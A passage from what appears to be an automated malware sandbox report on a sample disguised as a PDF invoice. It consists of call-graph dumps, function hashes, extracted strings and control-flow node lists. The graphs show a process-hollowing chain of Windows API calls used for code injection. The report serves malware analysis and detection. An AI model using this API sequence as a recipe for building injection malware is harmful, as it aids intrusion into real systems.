68737->68738 68740 68e78dd 68738->68740 68740->68677 68742 68e78a0 VirtualAllocEx 68741->68742 68744 68e78dd 68742->68744 68744->68677 68746 68e7b18 WriteProcessMemory 68745->68746 68748 68e7b6f 68746->68748 68748->68682 68750 68e7b18 WriteProcessMemory 68749->68750 68752 68e7b6f 68750->68752 68752->68682 68754 68e8130 NtResumeThread 68753->68754 68756 68e8165 68754->68756 68756->68687 68758 68e8130 NtResumeThread 68757->68758 68760 68e8165 68758->68760 68760->68687 68762 675e884 68761->68762 68770 675e8c1 68762->68770 68824 675f398 68762->68824 68828 675ecdf 68762->68828 68833 675ed9f 68762->68833 68837 675ef32 68762->68837 68841 675f0bd 68762->68841 68845 675f076 68762->68845 68849 675ebab 68762->68849 68853 675e9eb 68762->68853 68857 675e8e8 68762->68857 68861 675f328 68762->68861 68865 675eb2c 68762->68865 68869 675f2e9 68762->68869 68873 675f0c2 68762->68873 68877 675f18d 68762->68877 68881 675e963 68762->68881 68885 675f2a3 68762->68885 68889 675eae3 68762->68889 68893 675e8f8 68762->68893 68770->68697 68783 675e89f 68782->68783 68784 675f076 2 API calls 68783->68784 68785 675ef32 2 API calls 68783->68785 68786 675f0bd 2 API calls 68783->68786 68787 675ecdf 2 API calls 68783->68787 68788 675ed9f 2 API calls 68783->68788 68789 675e8f8 2 API calls 68783->68789 68790 675f398 2 API calls 68783->68790 68791 675eae3 2 API calls 68783->68791 68792 675e963 2 API calls 68783->68792 68793 675f2a3 2 API calls 68783->68793 68794 675f0c2 2 API calls 68783->68794 68795 675f18d 2 API calls 68783->68795 68796 675e8c1 68783->68796 68797 675eb2c 2 API calls 68783->68797 68798 675f2e9 2 API calls 68783->68798 68799 675e8e8 2 API calls 68783->68799 68800 675f328 2 API calls 68783->68800 68801 675ebab 2 API calls 68783->68801 68802 675e9eb 2 API calls 68783->68802 68784->68796 68785->68796 68786->68796 68787->68796 68788->68796 68789->68796 68790->68796 68791->68796 68792->68796 68793->68796 68794->68796 68795->68796 68796->68697 68797->68796 68798->68796 68799->68796 68800->68796 68801->68796 68802->68796 68804 675e793 68803->68804 68805 675f076 2 API calls 68804->68805 68806 675ef32 2 API calls 68804->68806 68807 675f0bd 2 API calls 68804->68807 68808 675ecdf 2 API calls 68804->68808 68809 675ed9f 2 API calls 68804->68809 68810 675e8f8 2 API calls 68804->68810 68811 675f398 2 API calls 68804->68811 68812 675e80f 68804->68812 68813 675eae3 2 API calls 68804->68813 68814 675e963 2 API calls 68804->68814 68815 675f2a3 2 API calls 68804->68815 68816 675f0c2 2 API calls 68804->68816 68817 675f18d 2 API calls 68804->68817 68818 675eb2c 2 API calls 68804->68818 68819 675f2e9 2 API calls 68804->68819 68820 675e8e8 2 API calls 68804->68820 68821 675f328 2 API calls 68804->68821 68822 675ebab 2 API calls 68804->68822 68823 675e9eb 2 API calls 68804->68823 68805->68812 68806->68812 68807->68812 68808->68812 68809->68812 68810->68812 68811->68812 68812->68697 68813->68812 68814->68812 68815->68812 68816->68812 68817->68812 68818->68812 68819->68812 68820->68812 68821->68812 68822->68812 68823->68812 68825 675e94b 68824->68825 68897 68e5458 68825->68897 68901 68e544c 68825->68901 68829 675e94b 68828->68829 68830 675efa5 68828->68830 68831 68e544c CreateProcessA 68829->68831 68832 68e5458 CreateProcessA 68829->68832 68830->68770 68831->68829 68832->68829 68834 675e94b 68833->68834 68835 68e544c CreateProcessA 68834->68835 68836 68e5458 CreateProcessA 68834->68836 68835->68834 68836->68834 68838 675e94b 68837->68838 68839 68e544c CreateProcessA 68838->68839 68840 68e5458 CreateProcessA 68838->68840 68839->68838 68840->68838 68842 675e94b 68841->68842 68843 68e544c CreateProcessA 68842->68843 68844 68e5458 CreateProcessA 68842->68844 68843->68842 68844->68842 68846 675e94b 68845->68846 68847 68e544c CreateProcessA 68846->68847 68848 68e5458 CreateProcessA 68846->68848 68847->68846 68848->68846 68850 675e94b 68849->68850 68851 68e544c CreateProcessA 68850->68851 68852 68e5458 CreateProcessA 68850->68852 68851->68850 68852->68850 68854 675e94b 68853->68854 68855 68e544c CreateProcessA 68854->68855 68856 68e5458 CreateProcessA 68854->68856 68855->68854 68856->68854 68858 675e92b 68857->68858 68859 68e544c CreateProcessA 68858->68859 68860 68e5458 CreateProcessA 68858->68860 68859->68858 68860->68858 68862 675e94b 68861->68862 68863 68e544c CreateProcessA 68862->68863 68864 68e5458 CreateProcessA 68862->68864 68863->68862 68864->68862 68866 675e94b 68865->68866 68867 68e544c CreateProcessA 68866->68867 68868 68e5458 CreateProcessA 68866->68868 68867->68866 68868->68866 68870 675e94b 68869->68870 68871 68e544c CreateProcessA 68870->68871 68872 68e5458 CreateProcessA 68870->68872 68871->68870 68872->68870 68874 675e94b 68873->68874 68875 68e544c CreateProcessA 68874->68875 68876 68e5458 CreateProcessA 68874->68876 68875->68874 68876->68874 68878 675e94b 68877->68878 68879 68e544c CreateProcessA 68878->68879 68880 68e5458 CreateProcessA 68878->68880 68879->68878 68880->68878 68882 675e94b 68881->68882 68883 68e544c CreateProcessA 68882->68883 68884 68e5458 CreateProcessA 68882->68884 68883->68882 68884->68882 68886 675e94b 68885->68886 68887 68e544c CreateProcessA 68886->68887 68888 68e5458 CreateProcessA 68886->68888 68887->68886 68888->68886 68890 675e94b 68889->68890 68891 68e544c CreateProcessA 68890->68891 68892 68e5458 CreateProcessA 68890->68892 68891->68890 68892->68890 68894 675e92b 68893->68894 68895 68e544c CreateProcessA 68894->68895 68896 68e5458 CreateProcessA 68894->68896 68895->68894 68896->68894 68898 68e54bc CreateProcessA 68897->68898 68900 68e5644 68898->68900 68902 68e54bc CreateProcessA 68901->68902 68904 68e5644 68902->68904 68906 68e72fd Wow64SetThreadContext 68905->68906 68908 68e7345 68906->68908 68908->68703 68910 68e72fd Wow64SetThreadContext 68909->68910 68912 68e7345 68910->68912 68912->68703 68996 66a879f 68997 66a87a9 68996->68997 69001 676e5c8 68997->69001 69005 676e5b9 68997->69005 69002 676e5dd 69001->69002 69009 676e720 69002->69009 69006 676e5dd 69005->69006 69008 676e720 2 API calls 69006->69008 69007 66a87e7 69008->69007 69010 676e6d2 69009->69010 69010->69009 69013 67522f0 69010->69013 69017 67522e8 69010->69017 69014 6752330 SleepEx 69013->69014 69016 675236e 69014->69016 69016->69010 69018 67522ec SleepEx 69017->69018 69020 675236e 69018->69020 69020->69010 68966 d2d01c 68967 d2d034 68966->68967 68968 d2d08f 68967->68968 68971 6491838 68967->68971 68976 649182d 68967->68976 68972 6491860 68971->68972 68982 6491cb7 68972->68982 68987 6491cc8 68972->68987 68973 6491887 68977 6491836 68976->68977 68978 64917f6 68976->68978 68980 6491cc8 2 API calls 68977->68980 68981 6491cb7 2 API calls 68977->68981 68978->68968 68979 6491887 68979->68979 68980->68979 68981->68979 68983 6491cf5 68982->68983 68984 6490dc0 2 API calls 68983->68984 68986 6491e8b 68983->68986 68985 6491e7c 68984->68985 68985->68973 68986->68973 68988 6491cf5 68987->68988 68989 6491e8b 68988->68989 68990 6490dc0 2 API calls 68988->68990 68989->68973 68991 6491e7c 68990->68991 68991->68973 68992 68e4a50 68993 68e4a9e NtProtectVirtualMemory 68992->68993 68995 68e4ae8 68993->68995 68913 d73068 68914 d73082 68913->68914 68915 d73092 68914->68915 68918 d78593 68914->68918 68922 d78527 68914->68922 68927 6490dc0 68918->68927 68932 6490db1 68918->68932 68919 d785ab 68923 d7bc15 68922->68923 68945 64920c0 68923->68945 68949 64920b0 68923->68949 68924 d7bc36 68929 6490de7 68927->68929 68928 6490ea4 68928->68919 68937 6491230 68929->68937 68941 6491228 68929->68941 68934 6490de7 68932->68934 68933 6490ea4 68933->68919 68935 6491228 VirtualProtect 68934->68935 68936 6491230 VirtualProtect 68934->68936 68935->68933 68936->68933 68938 6491278 VirtualProtect 68937->68938 68940 64912b3 68938->68940 68940->68928 68942 6491278 VirtualProtect 68941->68942 68944 64912b3 68942->68944 68944->68928 68946 64920d5 68945->68946 68953 6492101 68946->68953 68950 64920c0 68949->68950 68952 6492101 2 API calls 68950->68952 68951 64920ed 68951->68924 68952->68951 68955 6492137 68953->68955 68954 64920ed 68954->68924 68958 6492210 68955->68958 68962 6492218 68955->68962 68959 6492218 VirtualAlloc 68958->68959 68961 6492292 68959->68961 68961->68954 68963 6492258 VirtualAlloc 68962->68963 68965 6492292 68963->68965 68965->68954

                                                                                      Executed Functions

                                                                                      Function 066ADA20 Relevance: 16.2, Strings: 12, Instructions: 1175COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: ,wq$4$$sq$$sq$$sq$$sq$$sq$$sq$$sq$$sq$$sq$$sq
                                                                                      • API String ID: 0-142878317
                                                                                      • Opcode ID: 4201ac808abc53612a0b489f117d4fd13226354d93f5ed978b4bf067448a24e0
                                                                                      • Instruction ID: 88ab0c45a7508c91368707bf89ef1fce9f5853cd613150f7b35b65919b49316b
                                                                                      • Opcode Fuzzy Hash: 4201ac808abc53612a0b489f117d4fd13226354d93f5ed978b4bf067448a24e0
                                                                                      • Instruction Fuzzy Hash: CFB20634A00228DFDB54DFA8C984BADB7B6BF88300F148599E505AB3A5CB71EC85DF50
                                                                                      Function 066ADD47 Relevance: 8.0, Strings: 6, Instructions: 495COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: ,wq$4$$sq$$sq$$sq$$sq
                                                                                      • API String ID: 0-3730739033
                                                                                      • Opcode ID: aeaac5910b75c1c774ef79fe54fe72583460562294193704bd4a0c25134e0aff
                                                                                      • Instruction ID: b47c222e96d41670b6b1421d41278f7bc61adc0cdd7e9d2c68bb044218c447ce
                                                                                      • Opcode Fuzzy Hash: aeaac5910b75c1c774ef79fe54fe72583460562294193704bd4a0c25134e0aff
                                                                                      • Instruction Fuzzy Hash: 4722D774A00218DFDB64DFA4C984BADB7B2BF88300F148199E509AB3A5DB71ED85DF50
                                                                                      Function 06495BA8 Relevance: 6.0, Strings: 4, Instructions: 983COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 632 6495ba8-6495bc9 633 6495bcb 632->633 634 6495bd0-6495cb7 632->634 633->634 636 64963b9-64963e1 634->636 637 6495cbd-6495dfe 634->637 640 6496ae7-6496af0 636->640 681 6496382-64963ac 637->681 682 6495e04-6495e5f 637->682 642 64963ef-64963f9 640->642 643 6496af6-6496b0d 640->643 644 64963fb 642->644 645 6496400-64964f4 642->645 644->645 664 649651e 645->664 665 64964f6-6496502 645->665 666 6496524-6496544 664->666 667 649650c-6496512 665->667 668 6496504-649650a 665->668 672 64965a4-6496624 666->672 673 6496546-649659f 666->673 670 649651c 667->670 668->670 670->666 695 649667b-64966be 672->695 696 6496626-6496679 672->696 687 6496ae4 673->687 693 64963ae 681->693 694 64963b6-64963b7 681->694 688 6495e61 682->688 689 6495e64-6495e6f 682->689 687->640 688->689 692 6496297-649629d 689->692 697 64962a3-649631f call 6490558 692->697 698 6495e74-6495e92 692->698 693->694 694->636 719 64966c9-64966d2 695->719 696->719 740 649636c-6496372 697->740 699 6495ee9-6495efe 698->699 700 6495e94-6495e98 698->700 704 6495f00 699->704 705 6495f05-6495f1b 699->705 700->699 707 6495e9a-6495ea5 700->707 704->705 709 6495f1d 705->709 710 6495f22-6495f39 705->710 711 6495edb-6495ee1 707->711 709->710 713 6495f3b 710->713 714 6495f40-6495f56 710->714 716 6495ee3-6495ee4 711->716 717 6495ea7-6495eab 711->717 713->714 722 6495f58 714->722 723 6495f5d-6495f64 714->723 718 6495f67-6495fd2 716->718 720 6495ead 717->720 721 6495eb1-6495ec9 717->721 729 6495fd4-6495fe0 718->729 730 6495fe6-649619b 718->730 725 6496732-6496741 719->725 720->721 727 6495ecb 721->727 728 6495ed0-6495ed8 721->728 722->723 723->718 732 6496743-64967cb 725->732 733 64966d4-64966fc 725->733 727->728 728->711 729->730 738 649619d-64961a1 730->738 739 64961ff-6496214 730->739 770 6496944-6496950 732->770 735 64966fe 733->735 736 6496703-649672c 733->736 735->736 736->725 738->739 742 64961a3-64961b2 738->742 744 649621b-649623c 739->744 745 6496216 739->745 746 6496321-6496369 call 6490d78 * 2 740->746 747 6496374-649637a 740->747 751 64961f1-64961f7 742->751 748 649623e 744->748 749 6496243-6496262 744->749 745->744 746->740 747->681 748->749 753 6496269-6496289 749->753 754 6496264 749->754 756 64961f9-64961fa 751->756 757 64961b4-64961b8 751->757 762 649628b 753->762 763 6496290 753->763 754->753 765 6496294 756->765 760 64961ba-64961be 757->760 761 64961c2-64961e3 757->761 760->761 766 64961ea-64961ee 761->766 767 64961e5 761->767 762->763 763->765 765->692 766->751 767->766 772 64967d0-64967d9 770->772 773 6496956-64969b1 770->773 774 64967db 772->774 775 64967e2-6496938 772->775 788 64969e8-6496a12 773->788 789 64969b3-64969e6 773->789 774->775 777 64967e8-6496828 774->777 778 649682d-649686d 774->778 779 6496872-64968b2 774->779 780 64968b7-64968f7 774->780 790 649693e 775->790 777->790 778->790 779->790 780->790 797 6496a1b-6496aae 788->797 789->797 790->770 801 6496ab5-6496ad5 797->801 801->687
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2220839867.0000000006490000.00000040.00000800.00020000.00000000.sdmp, Offset: 06490000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6490000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: TJxq$Tesq$pwq$xbvq
                                                                                      • API String ID: 0-2278277230
                                                                                      • Opcode ID: ce0aff74c769624eaa128255faa6934eed51951193929810b9416f727bc9d19f
                                                                                      • Instruction ID: 02d01dcc023d46d79c78ecfc98f628fcd7ad81e9762f12fe51e65fc78023e320
                                                                                      • Opcode Fuzzy Hash: ce0aff74c769624eaa128255faa6934eed51951193929810b9416f727bc9d19f
                                                                                      • Instruction Fuzzy Hash: 0BA2C575A00228CFDB65CF69C984AD9BBB2FF89304F1581E9D509AB325DB319E81CF50
                                                                                      Function 06498149 Relevance: 5.1, Strings: 3, Instructions: 1339COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 803 6498149-649817e 804 6498180 803->804 805 6498185-64982a7 803->805 804->805 809 64982a9-64982bf 805->809 810 64982cb-64982d7 805->810 1087 64982c5 call 649acd1 809->1087 1088 64982c5 call 649ace0 809->1088 811 64982d9 810->811 812 64982de-64982e3 810->812 811->812 813 649831b-6498364 812->813 814 64982e5-64982f1 812->814 824 649836b-64983ae 813->824 825 6498366 813->825 816 64982f8-6498316 814->816 817 64982f3 814->817 818 6499a7f-6499a85 816->818 817->816 820 6499ab0 818->820 821 6499a87-6499aa7 818->821 821->820 829 64983ba-6498630 824->829 825->824 850 6499060-649906c 829->850 851 6499072-64990aa 850->851 852 6498635-6498641 850->852 860 6499184-649918a 851->860 853 6498648-649876d 852->853 854 6498643 852->854 889 64987ad-6498836 853->889 890 649876f-64987a7 853->890 854->853 862 64990af-649912c 860->862 863 6499190-64991c8 860->863 878 649915f-6499181 862->878 879 649912e-6499132 862->879 873 6499526-649952c 863->873 875 64991cd-64993cf 873->875 876 6499532-649957a 873->876 970 649946e-6499472 875->970 971 64993d5-6499469 875->971 886 649957c-64995ef 876->886 887 64995f5-6499640 876->887 878->860 879->878 881 6499134-649915c 879->881 881->878 886->887 909 6499a49-6499a4f 887->909 915 6498838-6498840 889->915 916 6498845-64988c9 889->916 890->889 911 6499645-64996c7 909->911 912 6499a55-6499a7d 909->912 930 64996c9-64996e4 911->930 931 64996ef-64996fb 911->931 912->818 919 6499051-649905d 915->919 943 64988d8-649895c 916->943 944 64988cb-64988d3 916->944 919->850 930->931 932 64996fd 931->932 933 6499702-649970e 931->933 932->933 935 6499721-6499730 933->935 936 6499710-649971c 933->936 940 6499739-6499a11 935->940 941 6499732 935->941 939 6499a30-6499a46 936->939 939->909 975 6499a1c-6499a28 940->975 941->940 945 6499898-6499901 941->945 946 649982a-6499893 941->946 947 64997ad-6499825 941->947 948 649973f-64997a8 941->948 949 6499906-649996e 941->949 995 649896b-64989ef 943->995 996 649895e-6498966 943->996 944->919 945->975 946->975 947->975 948->975 981 64999e2-64999e8 949->981 977 64994cf-649950c 970->977 978 6499474-64994cd 970->978 993 649950d-6499523 971->993 975->939 977->993 978->993 983 64999ea-64999f4 981->983 984 6499970-64999ce 981->984 983->975 1000 64999d0 984->1000 1001 64999d5-64999df 984->1001 993->873 1008 64989fe-6498a82 995->1008 1009 64989f1-64989f9 995->1009 996->919 1000->1001 1001->981 1015 6498a91-6498b15 1008->1015 1016 6498a84-6498a8c 1008->1016 1009->919 1022 6498b24-6498ba8 1015->1022 1023 6498b17-6498b1f 1015->1023 1016->919 1029 6498baa-6498bb2 1022->1029 1030 6498bb7-6498c3b 1022->1030 1023->919 1029->919 1036 6498c4a-6498cce 1030->1036 1037 6498c3d-6498c45 1030->1037 1043 6498cdd-6498d61 1036->1043 1044 6498cd0-6498cd8 1036->1044 1037->919 1050 6498d70-6498df4 1043->1050 1051 6498d63-6498d6b 1043->1051 1044->919 1057 6498e03-6498e87 1050->1057 1058 6498df6-6498dfe 1050->1058 1051->919 1064 6498e89-6498e91 1057->1064 1065 6498e96-6498f1a 1057->1065 1058->919 1064->919 1071 6498f29-6498fad 1065->1071 1072 6498f1c-6498f24 1065->1072 1078 6498fbc-6499040 1071->1078 1079 6498faf-6498fb7 1071->1079 1072->919 1085 649904c-649904e 1078->1085 1086 6499042-649904a 1078->1086 1079->919 1085->919 1086->919 1087->810 1088->810
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2220839867.0000000006490000.00000040.00000800.00020000.00000000.sdmp, Offset: 06490000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6490000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 2$xJ$$sq
                                                                                      • API String ID: 0-1603914979
                                                                                      • Opcode ID: 6e9853af8e3579baabcd5b96c067bab8ce7a93a14ab3f7d0e56de5c0836f4362
                                                                                      • Instruction ID: 25e1d6a32495586141df4dd0b67f85aa150357717421246051c28b6597b172f6
                                                                                      • Opcode Fuzzy Hash: 6e9853af8e3579baabcd5b96c067bab8ce7a93a14ab3f7d0e56de5c0836f4362
                                                                                      • Instruction Fuzzy Hash: 09E2B2B4A002288FDB65DF69D8947DEBBB2FB8A301F1091E9D419A7355DB305E81CF60
                                                                                      Function 068E12F8 Relevance: 4.4, Strings: 3, Instructions: 613COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1118 68e12f8-68e1319 1119 68e131b 1118->1119 1120 68e1320-68e1403 call 68e1e48 1118->1120 1119->1120 1128 68e1405-68e1410 1120->1128 1129 68e1412 1120->1129 1130 68e141c-68e1537 1128->1130 1129->1130 1141 68e1549-68e1574 1130->1141 1142 68e1539-68e153f 1130->1142 1143 68e1d28-68e1d44 1141->1143 1142->1141 1144 68e1d4a-68e1d65 1143->1144 1145 68e1579-68e16dc 1143->1145 1155 68e16ee-68e1824 1145->1155 1156 68e16de-68e16e4 1145->1156 1209 68e182a call 65c2349 1155->1209 1210 68e182a call 65c2301 1155->1210 1156->1155 1165 68e182f-68e186b 1166 68e186d-68e1871 1165->1166 1167 68e18d0-68e18da 1165->1167 1168 68e1879-68e18cb 1166->1168 1169 68e1873-68e1874 1166->1169 1170 68e1b01-68e1b20 1167->1170 1171 68e1ba6-68e1c11 1168->1171 1169->1171 1172 68e18df-68e1a25 1170->1172 1173 68e1b26-68e1b50 1170->1173 1189 68e1c23-68e1c6e 1171->1189 1190 68e1c13-68e1c19 1171->1190 1201 68e1afa-68e1afb 1172->1201 1202 68e1a2b-68e1af7 1172->1202 1179 68e1b52-68e1ba0 1173->1179 1180 68e1ba3-68e1ba4 1173->1180 1179->1180 1180->1171 1192 68e1d0d-68e1d25 1189->1192 1193 68e1c74-68e1d0c 1189->1193 1190->1189 1192->1143 1193->1192 1201->1170 1202->1201 1209->1165 1210->1165
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2223619295.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_68e0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: fxq$8$xJ
                                                                                      • API String ID: 0-3933628963
                                                                                      • Opcode ID: a3fedeba290541d3ea350a3338da4a754fd1821f8bf3bd4bc735039f413ea438
                                                                                      • Instruction ID: c9f7df499634bdec02d5a9f79ff4385379d1ee1f2ae0ad0a6c89c14c21b613ae
                                                                                      • Opcode Fuzzy Hash: a3fedeba290541d3ea350a3338da4a754fd1821f8bf3bd4bc735039f413ea438
                                                                                      • Instruction Fuzzy Hash: 6A52E475E012298FDB64DF69C890BD9B7B1FB89300F5081EAD919A7354DB70AE81CF90
                                                                                      Function 065C6BF0 Relevance: 4.1, Strings: 3, Instructions: 313COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1580 65c6bf0-65c6bfd 1581 65c6c4e-65c6c81 1580->1581 1582 65c6bff-65c6c18 1580->1582 1589 65c6c88-65c6cb1 1581->1589 1590 65c6c83 1581->1590 1583 65c6c1f-65c6c2b 1582->1583 1584 65c6c1a 1582->1584 1662 65c6c2e call 65c6c50 1583->1662 1663 65c6c2e call 65c6bf0 1583->1663 1664 65c6c2e call 65c6c41 1583->1664 1584->1583 1588 65c6c30-65c6c39 1593 65c6cb3-65c6cb6 1589->1593 1590->1589 1594 65c6cb9-65c6cbf 1593->1594 1595 65c6cc8-65c6cc9 1594->1595 1596 65c6cc1 1594->1596 1627 65c6eab-65c6eba 1595->1627 1596->1595 1597 65c6f9e-65c6fbf call 65c1430 1596->1597 1598 65c6f1b-65c6f1f 1596->1598 1599 65c7015-65c7022 1596->1599 1600 65c6d50-65c6d62 1596->1600 1601 65c7012-65c7013 1596->1601 1602 65c7052-65c7061 1596->1602 1603 65c6e53-65c6e59 1596->1603 1604 65c6cce-65c6cda 1596->1604 1605 65c6dca-65c6deb call 65c1430 1596->1605 1606 65c6fca-65c6fd4 call 65c72e1 1596->1606 1607 65c6fc4-65c6fc5 1596->1607 1608 65c7000-65c700d 1596->1608 1609 65c6f3e-65c6f5f call 65c1430 1596->1609 1610 65c6ebf-65c6edf 1596->1610 1611 65c6f38-65c6f39 1596->1611 1612 65c6ffa-65c6ffb 1596->1612 1613 65c7036-65c703c 1596->1613 1614 65c6ff7-65c6ff8 1596->1614 1615 65c6cf7-65c6d17 1596->1615 1616 65c7030-65c7031 1596->1616 1617 65c6df0-65c6df1 1596->1617 1618 65c6ef0-65c6ef9 1596->1618 1619 65c6f32-65c6f33 1596->1619 1620 65c6df3-65c6e10 1596->1620 1621 65c6e2c-65c6e4e 1596->1621 1622 65c6dae-65c6db7 1596->1622 1623 65c6e6f-65c6e98 1596->1623 1624 65c6e29-65c6e2a 1596->1624 1625 65c6f6a-65c6f8d 1596->1625 1626 65c702a-65c702b 1596->1626 1596->1627 1628 65c6f64-65c6f65 1596->1628 1629 65c7027-65c7028 1596->1629 1630 65c6fe7-65c6ff2 1596->1630 1631 65c6e23-65c6e24 1596->1631 1632 65c6d23-65c6d3f 1596->1632 1597->1593 1598->1602 1642 65c6f25-65c6f2d 1598->1642 1599->1594 1652 65c6d69-65c6d9b 1600->1652 1653 65c6d64 1600->1653 1601->1613 1602->1593 1636 65c6e5b 1603->1636 1637 65c6e62-65c6e6a 1603->1637 1646 65c6cdc 1604->1646 1647 65c6ce1-65c6cf5 1604->1647 1605->1594 1658 65c6fda-65c6fe6 1606->1658 1608->1594 1609->1594 1610->1594 1639 65c6ee5-65c6eeb 1610->1639 1611->1613 1612->1609 1648 65c703e 1613->1648 1649 65c7045-65c704d 1613->1649 1614->1613 1615->1594 1650 65c6d19-65c6d21 1615->1650 1617->1605 1640 65c6efb 1618->1640 1641 65c6f00-65c6f08 1618->1641 1619->1613 1620->1594 1635 65c6e16-65c6e1e 1620->1635 1621->1594 1622->1606 1633 65c6dbd-65c6dc5 1622->1633 1623->1594 1638 65c6e9e-65c6ea6 1623->1638 1624->1622 1625->1594 1644 65c6f93-65c6f99 1625->1644 1626->1618 1627->1594 1629->1613 1630->1594 1631->1613 1632->1594 1651 65c6d45-65c6d4b 1632->1651 1633->1594 1635->1594 1636->1598 1636->1600 1636->1604 1636->1608 1636->1612 1636->1618 1636->1623 1636->1625 1636->1632 1636->1637 1637->1593 1638->1594 1639->1594 1640->1641 1641->1630 1660 65c6f0e-65c6f16 1641->1660 1642->1593 1644->1594 1646->1647 1647->1594 1648->1598 1648->1608 1648->1612 1648->1618 1648->1623 1648->1632 1648->1649 1649->1594 1650->1594 1651->1594 1652->1594 1654 65c6da1-65c6da9 1652->1654 1653->1652 1654->1594 1660->1593 1662->1588 1663->1588 1664->1588
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: !$#$xJ
                                                                                      • API String ID: 0-636449615
                                                                                      • Opcode ID: a7b86e3ab33c17eaf9725094cb46e2eeb3bfd70a4ebde2c2d3c23c7228e5f15e
                                                                                      • Instruction ID: 774cab0679224e55129b6ae8a7c000b1b36257318e91afc2c52944e77ec942d0
                                                                                      • Opcode Fuzzy Hash: a7b86e3ab33c17eaf9725094cb46e2eeb3bfd70a4ebde2c2d3c23c7228e5f15e
                                                                                      • Instruction Fuzzy Hash: 6FC1F270D05208CFEB50CFE9D444AEDBBB2FB8A324F10946AD819BB241D7B59A45CF94
                                                                                      Function 065C6C50 Relevance: 4.0, Strings: 3, Instructions: 287COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1742 65c6c50-65c6c81 1744 65c6c88-65c6cb1 1742->1744 1745 65c6c83 1742->1745 1748 65c6cb3-65c6cb6 1744->1748 1745->1744 1749 65c6cb9-65c6cbf 1748->1749 1750 65c6cc8-65c6cc9 1749->1750 1751 65c6cc1 1749->1751 1782 65c6eab-65c6eba 1750->1782 1751->1750 1752 65c6f9e-65c6fbf call 65c1430 1751->1752 1753 65c6f1b-65c6f1f 1751->1753 1754 65c7015-65c7022 1751->1754 1755 65c6d50-65c6d62 1751->1755 1756 65c7012-65c7013 1751->1756 1757 65c7052-65c7061 1751->1757 1758 65c6e53-65c6e59 1751->1758 1759 65c6cce-65c6cda 1751->1759 1760 65c6dca-65c6deb call 65c1430 1751->1760 1761 65c6fca-65c6fd4 call 65c72e1 1751->1761 1762 65c6fc4-65c6fc5 1751->1762 1763 65c7000-65c700d 1751->1763 1764 65c6f3e-65c6f5f call 65c1430 1751->1764 1765 65c6ebf-65c6edf 1751->1765 1766 65c6f38-65c6f39 1751->1766 1767 65c6ffa-65c6ffb 1751->1767 1768 65c7036-65c703c 1751->1768 1769 65c6ff7-65c6ff8 1751->1769 1770 65c6cf7-65c6d17 1751->1770 1771 65c7030-65c7031 1751->1771 1772 65c6df0-65c6df1 1751->1772 1773 65c6ef0-65c6ef9 1751->1773 1774 65c6f32-65c6f33 1751->1774 1775 65c6df3-65c6e10 1751->1775 1776 65c6e2c-65c6e4e 1751->1776 1777 65c6dae-65c6db7 1751->1777 1778 65c6e6f-65c6e98 1751->1778 1779 65c6e29-65c6e2a 1751->1779 1780 65c6f6a-65c6f8d 1751->1780 1781 65c702a-65c702b 1751->1781 1751->1782 1783 65c6f64-65c6f65 1751->1783 1784 65c7027-65c7028 1751->1784 1785 65c6fe7-65c6ff2 1751->1785 1786 65c6e23-65c6e24 1751->1786 1787 65c6d23-65c6d3f 1751->1787 1752->1748 1753->1757 1797 65c6f25-65c6f2d 1753->1797 1754->1749 1807 65c6d69-65c6d9b 1755->1807 1808 65c6d64 1755->1808 1756->1768 1757->1748 1791 65c6e5b 1758->1791 1792 65c6e62-65c6e6a 1758->1792 1801 65c6cdc 1759->1801 1802 65c6ce1-65c6cf5 1759->1802 1760->1749 1813 65c6fda-65c6fe6 1761->1813 1763->1749 1764->1749 1765->1749 1794 